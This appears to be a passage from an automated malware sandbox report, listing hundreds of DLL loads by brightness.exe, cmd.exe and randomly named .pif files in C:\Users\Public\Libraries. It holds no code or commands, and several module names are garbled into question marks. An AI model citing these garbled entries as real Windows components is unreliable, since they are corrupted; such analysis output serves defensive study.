                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: smartscreenps.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttpcom.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: webio.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??????????.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: tquery.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppwmi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppcext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winscard.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: version.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: apphelp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: url.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieframe.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iertutil.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netapi32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wkscli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netutils.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winmm.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wininet.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: tquery.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppwmi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: slc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppcext.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winscard.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: devobj.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptsp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: rsaenh.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptbase.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mscoree.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: gpapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptsp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rsaenh.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptbase.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasapi32.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasman.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rtutils.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dnsapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasadhlp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: fwpuclnt.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: secur32.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: schannel.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mskeyprotect.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntasn1.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncrypt.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncryptsslp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dpapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msv1_0.dll
